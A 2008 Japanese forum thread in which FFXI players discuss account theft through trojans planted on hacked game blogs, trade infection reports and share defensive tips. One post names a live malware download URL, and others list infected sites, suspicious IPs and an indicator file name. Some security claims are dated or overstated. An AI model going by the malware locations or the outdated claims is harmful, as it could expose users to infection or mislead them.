まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは
気をつけないとだねぇ。

178 :既にその名前は使われています:2008/03/24(月) 13:55:10.96 ID:vtt50urT
ペコろぐ。 (罠撤去済み)
ヴァナモンblog (罠撤去済み)
FF11初心者の館 (ウイルス散布中)

179 :既にその名前は使われています:2008/03/24(月) 14:09:41.96 ID:37tZuH3A
もうFC2はソースチェッカーでチェックしてからじゃないと
怖くて踏めないな...

180 :既にその名前は使われています:2008/03/24(月) 14:11:42.90 ID:37tZuH3A
>>170

http://pc11.2ch.net/test/read.cgi/sec/1205842090/719

181 :既にその名前は使われています:2008/03/24(月) 14:31:36.43 ID:vTR+hCx8
注意age

182 :既にその名前は使われています:2008/03/24(月) 14:34:20.69 ID:Httpif6H
ぶっちゃけFC2側としてはたいして被害あるわけじゃないから
必死こく必要ないんだよなぁ

183 :既にその名前は使われています:2008/03/24(月) 14:45:51.90 ID:Ny3ZGjXA
とりあえず俺もHDD24時間稼働で1年経つし寿命ついでにOS再インスコしよう

そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……

184 :既にその名前は使われています:2008/03/24(月) 14:47:10.45 ID:WdMLKCJz
ほんっとにロクなもん混入しねえなあいつらwww

185 :既にその名前は使われています:2008/03/24(月) 14:53:21.20 ID:sI0/2XTk
「中国 混入」でググったら

予想を遥かに超えていた

186 :既にその名前は使われています:2008/03/24(月) 14:56:30.58 ID:Httpif6H
俺のIDもウィルススキャンしてくだしあ;

187 :既にその名前は使われています:2008/03/24(月) 15:02:06.20 ID:sV5MTkg6
俺の肛門もハックされそうだ!

188 :既にその名前は使われています:2008/03/24(月) 15:02:26.35 ID:sI0/2XTk
>>186
>>186
>>186

なにIDにURLとか貼ってるわけ?今時誰も踏まねーよプgr


189 :既にその名前は使われています:2008/03/24(月) 15:03:52.97 ID:8jcNID1A
ドリコムに作られた罠サイトを連絡フォームで通報した
先ほど、閲覧制限を掛けたとメールで連絡が来た

http://ff11xicng●blog●drecom●jp/
http://ff11hdiw●blog●drecom●jp/
閲覧制限確認

190 :既にその名前は使われています:2008/03/24(月) 15:15:39.10 ID:zZKH+Aj5
しかし10年前とかは輸出食品が劣悪ということはなかったんだよな
人増えすぎるとよくないな


191 :既にその名前は使われています:2008/03/24(月) 15:31:47.67 ID:+jpHHFib
>>95
そもそもMacはウイルスやマルウェアに
事実上感染しないんだから必要ないんだが。

192 :既にその名前は使われています:2008/03/24(月) 15:38:27.74 ID:+jpHHFib
>>148
おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
 ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。

ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。

193 :既にその名前は使われています:2008/03/24(月) 15:39:32.08 ID:RgZ1LaTX
>>191
数年前にやってたMacのTVCM思い出したよ。

「Macはウィルスに感染しないんだ!」って奴。
相手にされてないだけだろ、とテレビに向かって突っ込んだ記憶があるw

194 :既にその名前は使われています:2008/03/24(月) 15:41:14.29 ID:+jpHHFib
>>162
おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。

195 :既にその名前は使われています:2008/03/24(月) 15:42:23.89 ID:Q/ktx4QO
>>193
相手にしなさんな(´д`)

196 :既にその名前は使われています:2008/03/24(月) 15:44:19.68 ID:+jpHHFib
>>193
理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。

日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。

197 :既にその名前は使われています:2008/03/24(月) 15:45:03.69 ID:Q/ktx4QO
>>194
>入浴して
マウスだかコントローラだかを行水させちゃまずいだろw

198 :既にその名前は使われています:2008/03/24(月) 15:48:04.35 ID:gNFuY07B
烏の行水ならぬ鼠の行水・・・
【サンダー】【ショック】【気をつけてください。】

199 :既にその名前は使われています:2008/03/24(月) 15:51:14.37 ID:vtt50urT
>>196
わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?

200 :既にその名前は使われています:2008/03/24(月) 15:58:21.63 ID:xrdpbYwi
>>199
煽ってるの判ってるならスルーしれ。
いつも沸いてる既知外だろ。

201 :既にその名前は使われています:2008/03/24(月) 16:00:56.88 ID:+jpHHFib
>>199
そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。

202 :既にその名前は使われています:2008/03/24(月) 16:08:00.40 ID:UwqirNKw
なんつうか、防衛対策まともにとれないなら
PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい

203 :既にその名前は使われています:2008/03/24(月) 16:14:33.20 ID:+JYA+CIb
専ブラでID抽出するとテラワロスw

204 :既にその名前は使われています:2008/03/24(月) 16:14:57.46 ID:uo1cC9cX
パス変更した時に、盗まれるってのは、ある?

205 :既にその名前は使われています:2008/03/24(月) 16:18:28.67 ID:TvxgTMvM
>>204
すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに>>194の方法で変更するのが吉。

206 :既にその名前は使われています:2008/03/24(月) 16:50:57.84 ID:vtt50urT
>>205
> 99%以上が キーロガータイプではなく、
>パスワード保存ファイルを直接 盗んでいくタイプ

断言するのは危険。Winsock2のLSPにくっついてパケットキャプチャする
(保存していようが手入力しようが関係無い)タイプはずいぶん前から投入されている
(リネージュ等のネトゲアカウントハックにも、それ以外にも広く使われている)。
ttp://www.mcafee.com/japan/security/virG2007.asp?v=Generic%20LSP
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-210538
ちなみにこのタイプは手動で該当ファイルを削除すると
通信不能になって涙目になったりする。

207 :既にその名前は使われています:2008/03/24(月) 16:52:59.19 ID:vtt50urT
キーロガー型が現状少ないのはそのとおり。
余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に
マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで
先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた
(のでBOTNEWSなどでは「いまさら…」感があった)。

208 :既にその名前は使われています:2008/03/24(月) 17:09:06.90 ID:C2NTmBz4
夕べからこのスレ参考にして自分のPCにNoScriptとPeerGuardian導入
したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に
ならなくなってビビッタ。
どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は
Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が
起こるなんて事ってある?
一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に
できて、今Avastでスキャン中。

209 :既にその名前は使われています:2008/03/24(月) 17:21:09.00 ID:vtt50urT
原理的には可能だけど、まずないと思う。

210 :既にその名前は使われています:2008/03/24(月) 17:22:32.78 ID:Q/ktx4QO
>>208
妄想が豊かでうらやましいわw

211 :既にその名前は使われています:2008/03/24(月) 17:26:57.16 ID:C2NTmBz4
>>209
ですよねー。
>>210
あまりにもタイミングが良すぎで焦ったのよw

212 :既にその名前は使われています:2008/03/24(月) 17:34:35.33 ID:zErWARNN
UchinoLSの準はいじんwが
「垢ハック?あり得ねぇwww」
「される奴って馬鹿?w」
「FF専用PC用意すればいいのに馬鹿じゃねwww」
とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。
LS掲示板で騒いでた。

213 :既にその名前は使われています:2008/03/24(月) 17:35:58.73 ID:vtt50urT
FF専用PC用意してなかったんだね(´・ω・`)

214 :既にその名前は使われています:2008/03/24(月) 17:38:06.93 ID:zZKH+Aj5
>>212
自業自得だな
タル暗と同じレベルではずかしい

215 :既にその名前は使われています:2008/03/24(月) 17:42:19.74 ID:T6Wahbt1
垢ハックされたかもwwww

216 :既にその名前は使われています:2008/03/24(月) 17:46:25.63 ID:KodraVfX
垢ファックされた><

217 :既にその名前は使われています:2008/03/24(月) 17:53:18.88 ID:76dNoHqz
PG2インスコしたらFFも弾くんだなワロタ

218 :既にその名前は使われています:2008/03/24(月) 18:00:45.95 ID:Fm9VlWLZ
パスをスクリーンキーボードで入力したいんだけど
PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)

219 :既にその名前は使われています:2008/03/24(月) 18:06:10.11 ID:vtt50urT
アクセサリのユーザー補助。
アプリの追加で入れないと無いかも。

220 :既にその名前は使われています:2008/03/24(月) 18:10:09.72 ID:HWQPHJQs
>>217
はじかねぇよw

221 :既にその名前は使われています:2008/03/24(月) 18:10:44.01 ID:Fm9VlWLZ
そうなのか! 
ありがとう入れてくるは

222 :既にその名前は使われています:2008/03/24(月) 18:22:05.69 ID:76dNoHqz
>>220
接続すらできなくなるよ
初心者の俺にはPS2がお似合いなのかw

223 :既にその名前は使われています:2008/03/24(月) 18:23:48.81 ID:mvpeqCeH
先日ハックされました、ノートン最新状態で無反応。
FF立ち上げたらインストールディスクを入れろと指示されFF開始できない
CDもってきたら普通に起動、しかしIDやパスを再入力する状態
そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww
セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・
GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話
やっとGM来てキャラを即停止してもらい本人確認後キャラ返還
ギルや高額アイテムは一切無しの状態でした
ウイルスソフトで再サーチ+FFをインスコ
だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断
HDを初期化し終結・・・・・・

GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、
ということは何も戻ってこないということじゃんwwwwwww

不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・
GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!


224 :既にその名前は使われています:2008/03/24(月) 18:27:19.70 ID:lMomuAcj
>>222
前スレで詳しくわかんないならP2Pを許可するにしる
とか見たきがする

225 :既にその名前は使われています:2008/03/24(月) 18:29:27.04 ID:8bfKIyLi
いい加減、公式のトップページで注意喚起を促す文章載せろよクソエニ

226 :既にその名前は使われています:2008/03/24(月) 18:30:54.19 ID:zZKH+Aj5
>>223
ネットカフェは利用してないだろうな?
してたら間違いなくそこだ

227 :既にその名前は使われています:2008/03/24(月) 18:31:17.01 ID:+JYA+CIb
>>222
PG2 FFXI でぐぐれば幸せになれる

228 :既にその名前は使われています:2008/03/24(月) 18:31:35.14 ID:f8U+hHlG
インしたら数行垂れ流すだけでも随分違うのにな

229 :既にその名前は使われています:2008/03/24(月) 18:34:27.81 ID:uo1cC9cX
もう誰かが、シャウトで、伝えるて問題を大きくするしかないな

230 :既にその名前は使われています:2008/03/24(月) 18:45:05.56 ID:lMomuAcj
>>226
オチケツ、ネットカフェ使っても自宅PCのFFがCD入れろなんて言わないだろう。
きっと改ざんされたHPからトロイ入れられたんじゃないだろうか。

231 :既にその名前は使われています:2008/03/24(月) 18:51:29.02 ID:ExAbIYmH
http://www.playonline.com/ff11/polnews/news12892.shtml
何か対応してくれる!? わけねーかw

232 :既にその名前は使われています:2008/03/24(月) 19:02:15.55 ID:vQXYTLxz
>>223
ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。

233 :既にその名前は使われています:2008/03/24(月) 19:04:25.59 ID:QdOH9ZPy
韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?

234 :既にその名前は使われています:2008/03/24(月) 19:05:52.25 ID:zZKH+Aj5
ttp://www.playonline.com/ff11/rule/imgs/impb.jpg

したのうはは表情ふざけてんのか

235 :既にその名前は使われています:2008/03/24(月) 19:06:50.04 ID:zZKH+Aj5
>>233
それ新手の罠か?


236 :既にその名前は使われています:2008/03/24(月) 19:08:48.26 ID:+JYA+CIb
とりあえず、書き込んだあとに自分のID確認してみような

237 :既にその名前は使われています:2008/03/24(月) 19:16:24.20 ID:0G3UgKbW
Temporary Internet Filesの中の1つのファイルが 感染: Trojan-Downloader.VBS.Small.gn
と診断されました
マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが
最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました
そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが
このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません
中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです
ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか?
削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?

238 :既にその名前は使われています:2008/03/24(月) 19:20:12.37 ID:4CoULjpF
POLに適当なIDとパス入れた状態でアカハックさせればよくね

239 :既にその名前は使われています:2008/03/24(月) 19:21:31.66 ID:8jcNID1A
>>233
Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe

240 :既にその名前は使われています:2008/03/24(月) 19:43:53.89 ID:QdOH9ZPy
>>239
ありがとうございまs
tracert“s”.exeはありませんでした
PG2が真っ赤なログで不安すぎる・・・

241 :既にその名前は使われています:2008/03/24(月) 20:07:11.96 ID:Q/ktx4QO
>>237
>>29
過去ログ読め

242 :既にその名前は使われています:2008/03/24(月) 20:09:17.22 ID:AM88sWcX
マックでもアカハックされるの?マックにしようかなw

243 :既にその名前は使われています:2008/03/24(月) 20:14:02.64 ID:vznh5385
カスペルオンラインスキャナ走らせたのだが、結果のレポートのところで
感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて
ウィルス名のところに「ロックされています」て出てるのだが、これは何故?

244 :既にその名前は使われています:2008/03/24(月) 20:34:48.78 ID:+JYA+CIb
>>243
検査できませんでしたってログ

245 :既にその名前は使われています:2008/03/24(月) 20:37:12.64 ID:8jcNID1A
>>240
ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです

>>243
ほかのプログラムが使用中で開けないか削除できないから

246 :既にその名前は使われています:2008/03/24(月) 20:49:03.81 ID:nqpgFFzc
今月のパス抜きで可能性あるのは3月上旬あたりと中旬以降に該当サイトにアクセスした人間全員?
アクセス数から考えて、
アクセスしたけどん抜かれてない人が大多数だと思うんだけど、
その辺を分けてるものはなんだろ。
windows Update最新だと感染しないとかなのかな。

247 :既にその名前は使われています:2008/03/24(月) 20:54:25.34 ID:kh97SrbK
>>246
・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。

等々。

248 :既にその名前は使われています:2008/03/24(月) 20:55:46.56 ID:lzZx8A86
>>233
>韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?

58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。

逆に>>233のPCから、58.227.193.190へアクセスしてるなら、>>245氏の言うとおり
何か仕込まれてるのかも。

249 :既にその名前は使われています:2008/03/24(月) 20:58:51.08 ID:J6GiBSTn
>>233
ちょっと調べてみたが、韓国のスパムメール業者のIPらしいな。
なんかPCに入ってないか?

250 :既にその名前は使われています:2008/03/24(月) 21:50:03.03 ID:47bjLYLG
定期保守上げを。

251 :既にその名前は使われています:2008/03/24(月) 21:53:37.87 ID:UcF3Od6M
NOD32でも駆除できる?

252 :既にその名前は使われています:2008/03/24(月) 22:12:42.15 ID:QdOH9ZPy
Backdoor.Out Break  nk210-201-139-91.static.apol.com.tw
感染しまくりのようです orz

253 :既にその名前は使われています:2008/03/24(月) 22:14:23.47 ID:CHzqP0my
バハ鯖でまた垢ハック

254 :既にその名前は使われています:2008/03/24(月) 22:15:19.89 ID:hdKDzAOI
>>95
Mac用のPG2だけど英語版…
http://phoenixlabs.org/pgosx/

255 :既にその名前は使われています:2008/03/24(月) 22:28:28.26 ID:7DTVIQ6X
ネ実にわざわざ報告に来る人なんて被害者の100分の1くらいだろうし、実害数を考えると恐ろしい
さて本営は何時までだんまりを決め込むのやら

256 :既にその名前は使われています:2008/03/24(月) 22:31:14.88 ID:0jHdHBFL
業者対策へ本腰入れるのに3,4年掛かってるからな
1年後に対策したとしても、早いくらいだなw

257 :既にその名前は使われています:2008/03/24(月) 22:32:35.55 ID:tcfmCYoK
>>253
えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー

事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?

んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?

258 :既にその名前は使われています:2008/03/24(月) 22:37:56.69 ID:pye7laJB
パスをスクリーンキーボードで打ち込むようにしたんだが、
流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?

259 :既にその名前は使われています:2008/03/24(月) 22:39:07.41 ID:0U03pW8G
>>258
今のところFF11の垢ハックのためのものは出てない、と思いたい

260 :既にその名前は使われています:2008/03/24(月) 22:40:19.27 ID:pye7laJB
他のはあるのかよwwwwwww


恐ろしいな マジで

261 :既にその名前は使われています:2008/03/24(月) 22:40:43.61 ID:GcBBAZhm
原因究明・セキュリティの強化を
ttp://blog.fc2.com/forum/viewtopic.php?t=20829

FC2ユーザーフォーラムにスレが立った。
実際に被害に遭ったブログ主はここで経緯と状況を説明してもらえないだろうか。
第三者が伝聞で書き込みしていても意味が無い。

262 :既にその名前は使われています:2008/03/24(月) 22:59:32.30 ID:vtt50urT
>>251
無理。AntiVirならできる

263 :既にその名前は使われています:2008/03/24(月) 23:05:25.00 ID:tcfmCYoK
>>261
fc2ってだけでアクセスしたくないなw

264 :既にその名前は使われています:2008/03/24(月) 23:19:20.01 ID:Yd7XwcSP
ノートン2008+PeerGuardian2で韓国やら香港やら厨国蹴って
ZoneAlarmでファイアウォールを有効にして
パスは手打ちで9桁。ブラウザはSleipnir
WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない

これでも抜かれるサイト踏んだらまず抜かれます?

ていうかPeerGuardian2入れてみてビビッタ
別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・



265 :既にその名前は使われています:2008/03/24(月) 23:25:51.11 ID:qfZn+dai
>>263
冗談抜きで同意するは

266 :既にその名前は使われています:2008/03/24(月) 23:32:02.13 ID:lzZx8A86
>>252
これかな。
http://spywaredetector.net/spyware_encyclopedia/Backdoor.Out%20Break.htm

残念だけど、バックドア仕込まれてたっぽいね。
FFと関係あるのかは不明だけど、>>249のスパム業者だったら、
スパムメールの送信端末とかにされてたのかも。

駆除するか、心配なら駆除した後でOSクリーンインストールして
おいたほうが安全だと思う。

267 :既にその名前は使われています:2008/03/24(月) 23:38:25.28 ID:vtt50urT
>>261
そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。

268 :既にその名前は使われています:2008/03/24(月) 23:40:22.20 ID:ApBIgGA/
仕事から帰ってきたらPOLパスワード変えられてました。
フレにGM呼んでもらって待ってるとこですが、
自キャラがどうやらログインしてる模様です。
なんだかなぁ・・・。

269 :既にその名前は使われています:2008/03/24(月) 23:42:00.79 ID:We8pVkNe
>>268
アチャ・・・(ノ_< ;)
早くGM来て行動止めてもらえるといいな

270 :既にその名前は使われています:2008/03/24(月) 23:44:12.74 ID:+KW5+qyc
http://jbbs.livedoor.jp/game/21862/
尻鯖板は管理人自身が業者ということが判明している
いちおう張って置きますね

271 :既にその名前は使われています:2008/03/24(月) 23:44:47.78 ID:T6Wahbt1
>>215でハックされたかもって言ったものだけどマジデされてた。
装備がエクレア品以外全部売られてて所持金が雀の涙ほどになってた。
マジデショックって言うかなんだかなぁって感じになるね

272 :既にその名前は使われています:2008/03/24(月) 23:44:52.61 ID:tcfmCYoK
スクエニ様〜おねげぇデスじゃ〜24時間窓口作ってくだされぇ〜〜ッて感じだよね

273 :268:2008/03/24(月) 23:46:54.93 ID:ApBIgGA/
>>269
80件以上待ちだということです。
倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・

274 :既にその名前は使われています:2008/03/24(月) 23:48:54.82 ID:We8pVkNe
>>273
それムカツクな
暫定でもいいからしばらく窓口を24時間にしてほしい

275 :既にその名前は使われています:2008/03/24(月) 23:51:06.74 ID:rpE40Jdl
そういえば、前ここでハックされたって報告来てた人が、2垢でGMコール呼びながら
のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって
英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね

276 :既にその名前は使われています:2008/03/24(月) 23:53:57.19 ID:1ggkpLWR
>>274
もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。

一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。

277 :既にその名前は使われています:2008/03/24(月) 23:56:33.23 ID:u0FcALPC
解約→FFアンインスコ
これが最大の防衛策に思えてきた

他のゲームならハックされたら公式HPでパスワード忘れた
→新パスワードがメールで送られてくる
→自分でログインしてINしてる業者落とす
→公式HPでパス再発行、ここでメール受け取らなきゃ安全
 OS再インスコ
これ24時間できたりするのよ

ハックされた人は面倒でもちゃんと警察に届けてね
届けないと□は「あなたが業者にパスとID教えた」
とみなすから

278 :既にその名前は使われています:2008/03/24(月) 23:57:04.89 ID:DyD4MS3I
久しぶりにログインしたらキャラが裸だったとか
今後続きそうだな

279 :既にその名前は使われています:2008/03/25(火) 00:00:11.53 ID:8jcNID1A
今月見つかったRealPlayerのActiveXコントロールの穴は
11.0.2でふさがったらしい
確証はないけど、今回の垢ハック騒動はこの穴も使われているかも

最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから
アンインストール推奨だけどな

280 :既にその名前は使われています:2008/03/25(火) 00:01:19.87 ID:mx3cOLzk
>>268のフレです。
まだGM待ちです。
たぶん、GMじゃ役に立たないだろうけど、思いだけは伝えようかと。

281 :既にその名前は使われています:2008/03/25(火) 00:05:41.63 ID:N6twjFNK
>>280
ガンガレ!
あと早急に対策をしてほしいって念を押して下さい
毎日ハック報告を見るのは辛すぎる

282 :既にその名前は使われています:2008/03/25(火) 00:05:51.11 ID:r19OMXfd
今現在動いてる厨蚊がいるなら天安門事件なりなんなり、
そのあたりの言葉でログ埋め尽くしてやりたい気分だな。
その手の言葉、詳しくないからあまり知らないが・・・。

283 :既にその名前は使われています:2008/03/25(火) 00:05:58.27 ID:GeAvoS1Q
ブログも一切見て無いが、やっぱり怖いよな・・・
本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど
そのうちとられたりするんじゃ無いかと思うと怖い・・・



284 :既にその名前は使われています:2008/03/25(火) 00:07:24.68 ID:WD+HwGs7
>>283
今すぐカスペルオンラインスキャナするんだ!

285 :既にその名前は使われています:2008/03/25(火) 00:08:09.82 ID:sGs0zFvT
バハ板も現在進行形でハック実況されてるなあ。
今回のメンテでなんとかして欲しいよ。

286 :既にその名前は使われています:2008/03/25(火) 00:08:16.82 ID:GeAvoS1Q
>>284
したよ。ノートン共に0
火狐でNoscriptも入れてる

287 :既にその名前は使われています:2008/03/25(火) 00:10:11.47 ID:j2GSQhJ6
白門でEでPT希望出してるKeycle

288 :既にその名前は使われています:2008/03/25(火) 00:10:28.66 ID:8nsrrYgI
PS2&箱ユーザーだけど、ここみて背筋が寒くなったので、POLにインする際に
メンバーパスワードを入れるようにしたよ。

289 :既にその名前は使われています:2008/03/25(火) 00:10:30.53 ID:WD+HwGs7
>>286
スキャナでトロイ出無いてことは、今は取られてないんじゃない?

290 :268:2008/03/25(火) 00:10:35.61 ID:HuadLiyJ
>>274
窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。

私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。

ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。

※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。

291 :既にその名前は使われています:2008/03/25(火) 00:11:18.51 ID:g7f8T3fx
Realpleyerの穴ってリアルプレイヤインスコしてなかったら無関係?
俺最近PCかい直してRPそのまま入れてないんだけど。

292 :既にその名前は使われています:2008/03/25(火) 00:12:32.76 ID:ZVcNVdfz
専ブラで見たらレス数少ないクソスレ乱立しまくりだな
ネ実は24時間あげあげあげえええ


293 :既にその名前は使われています:2008/03/25(火) 00:12:33.76 ID:GeAvoS1Q
>>289
まぁ、ブログはまったく見て無いからねw
でも、何か怖いよね・・・・
まったく関係の無いHPにまで仕込まれたりしてたらどうにもならんし・・・



294 :268:2008/03/25(火) 00:14:14.08 ID:HuadLiyJ
>>280
さんくす!!
なんという掲示板の私的利用w

これ以上犠牲者を増やさないように
みなさんのフレにも告知してあげてください!

295 :既にその名前は使われています:2008/03/25(火) 00:15:12.22 ID:WD+HwGs7
>>293
今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。

296 :既にその名前は使われています:2008/03/25(火) 00:17:52.26 ID:czdY66qa
>>291
インスコしてなければおk

Realplayerの代わりにReal Alternative入れている人も古いActiveXコントロールが
インスコされるので注意。

297 :既にその名前は使われています:2008/03/25(火) 00:18:43.66 ID:jhdd7oxY
バハ鯖で2日連続垢ハックwwwwww
被害者鯖スレに降臨中

298 :既にその名前は使われています:2008/03/25(火) 00:23:29.00 ID:nQ1aeD7W
取り合えずパスは用心して変えておいた

299 :既にその名前は使われています:2008/03/25(火) 00:24:20.68 ID:gAnYPalN
GMも垢ハック専用窓口を24時間体制で作れ!
自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?!
サポセンの電話は昼間だけだし・・・・・・


300 :既にその名前は使われています:2008/03/25(火) 00:38:30.70 ID:ZVcNVdfz
俺ハックされたら鯖スレにキャラネーム晒してなんとかして助けてもらおうとするだろうなw
だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。
ホント自分必死すぎでキモイ。

301 :既にその名前は使われています:2008/03/25(火) 01:00:12.55 ID:omlW/ixG
>>300
だが昨日はそれで助かったのかもしれない
必死だと思うのはしかたなかろうw

302 :既にその名前は使われています:2008/03/25(火) 01:03:42.77 ID:wU4wL3FZ
POLシステムを改良するか、サポセン24時間をすぐやれ!!


303 :既にその名前は使われています:2008/03/25(火) 01:11:36.40 ID:f5GA3rVo
バハ鯖スレみてきたよ。
昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。

同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。

これからどんどんハックされる人でてくるんだろうなぁ、
有名ブログが改ざんされたわけだし。

まじで、業者ゆるせん

304 :既にその名前は使われています:2008/03/25(火) 01:17:32.63 ID:vFPHu9Hl
・サポセンの24時間サポート
・指定されたISP(IP)からのみログイン可
・パスワードなどのアカウント情報変更時に秘密の質問
・アカウント情報変更後にユーザーにメールで変更のお知らせ
・ログインメッセージ・公式サイトのトップページで注意喚起
・LSCへのログインをPOLは別のID・パスワードに変更

このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は
すぐ出来ると思うんだがな。 
それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな
・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。




305 :既にその名前は使われています:2008/03/25(火) 01:18:08.85 ID:rMVWg75a
関わると危険だと言う意識が広まってしまうと、買い手が激減するだろうし
業者が自分で自分の首を絞めてるようにも思えるが・・・
こんなことが起きても、まだ買う奴なんているのかねぇ。


306 :既にその名前は使われています:2008/03/25(火) 01:23:18.89 ID:9f0lVnnD
PS2だけど、PCでLSコミュニティとか使ってたし
怖いからPOLのパスワード変えといたぜー。
これでもうLSコミュニティとか二度と使わなければ
一安心かな?まあでも定期的にパス変えよっと。
おそろしやおそろしや。

307 :既にその名前は使われています:2008/03/25(火) 01:25:00.75 ID:jhJ+BovV
>>305
自分は大丈夫。もしくはまた垢買うからいいんじゃね?
っていう思考じゃないかな

